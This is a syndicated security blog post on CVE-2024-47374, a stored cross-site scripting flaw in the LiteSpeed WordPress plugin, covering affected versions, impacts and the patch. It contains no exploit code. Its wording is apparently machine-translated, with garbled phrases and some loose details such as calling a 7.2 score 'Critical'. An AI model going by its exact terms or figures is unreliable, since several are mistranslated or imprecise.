LiteSpeed ​​plugin bug: WordPress users are exposed to XSS attacks

According to current reportsa new one Error in LiteSpeed ​​plugin has been discovered and WordPress users are now at risk of cross-site scripting (XSS) attacks. If the vulnerability is exploited, threat actors could execute arbitrary JavaScript code to carry out their malicious intent. In this article, we’ll discuss what this bug is, how serious it is, and which versions are affected. Let’s get started!

Error in LiteSpeed ​​plugin Revealed

Triggering the XSS attack Error in LiteSpeed ​​plugin is currently tracked as CVE-2024-47374. It has a Critical Vulnerability Severity Score (CVSS) of 7.2 and affects all versions including and up to 6.5.0.2. The flaw was discovered by Patchstack Alliance researcher TaiYou. The patch stack provides valuable insights stated The:

“It could allow any unauthenticated user to steal sensitive information to, in this case, perform privilege escalation on the WordPress site by making a single HTTP request.”

The flaw arises from the fact that the HTTP header value is formulated without output escaping and sanitizing, which allows threat actors to inject malicious web scripts. Nevertheless, it is “CSS combination” And “Generate UCSS” For the exploit to be successful, page optimization settings are required.

CVE-2024-47374 Attack details

As for the attack details, it is worth noting that vulnerabilities such as CVE-2024-47374, which play a key role in it, are present Error in LiteSpeed ​​plugin Attacks, allow any scripts injected and stored permanently. These malicious scripts can be stored in various locations including:

• Database.
• Visitor log.
• Comments.
• Message forum.
• Website server.

These locations are critical to threat actors because they ensure the execution of the malicious code every time a user lands on a compromised page. Such attacks can have serious consequences as they can be used to deliver browser-based payloads for multiple initiatives, including:

• Steal information.
• Hijacking an authenticated user’s session.
• Performing actions on behalf of the user.

The severity of such attack methods increases dramatically when the compromised user account belongs to a site administrator. In such a scenario, threat actors can gain complete control of a website.

Protection against security vulnerabilities in the WordPress plugin

Online threat actors are now using increasingly sophisticated methods to attack victims. Exploiting vulnerabilities like this Error in LiteSpeed ​​plugin has become a common tactic to compromise legitimate websites.

The LiteSpeed ​​plugin for WordPress currently has over 6 million active installations, meaning its exploitation represents a lucrative option for threat actors. With this in mind, it is important to know how to ensure protection against WordPress vulnerabilities.

To ensure protection from the vulnerability, users must update to the latest version released on September 25, 2024. This patch for the vulnerability was released a month after the developers fixed another vulnerability.

It is worth noting that the previous vulnerability was tracked as CVE-2024-44000 and had a CVSS score of 7.5. If exploited, this vulnerability could have allowed threat actors to take control of arbitrary accounts.

Diploma

The Error in LiteSpeed ​​plugin poses significant risk to WordPress users and presents the possibility of XSS attacks and privilege escalation. To protect against these vulnerabilities, it is crucial for users to update to the latest version of the plugin. Additionally, users must also implement proactive cybersecurity protocols to stay safe in the evolving online environment.

Sources for this piece include articles in The Hacker News And Beeping computer.

The post LiteSpeed ​​plugin error: WordPress users are exposed to XSS attacks appeared first on TuxCare.

*** This is a syndicated blog from TuxCare’s Security Bloggers Network, written by Wajahat Raja. Read the original post at: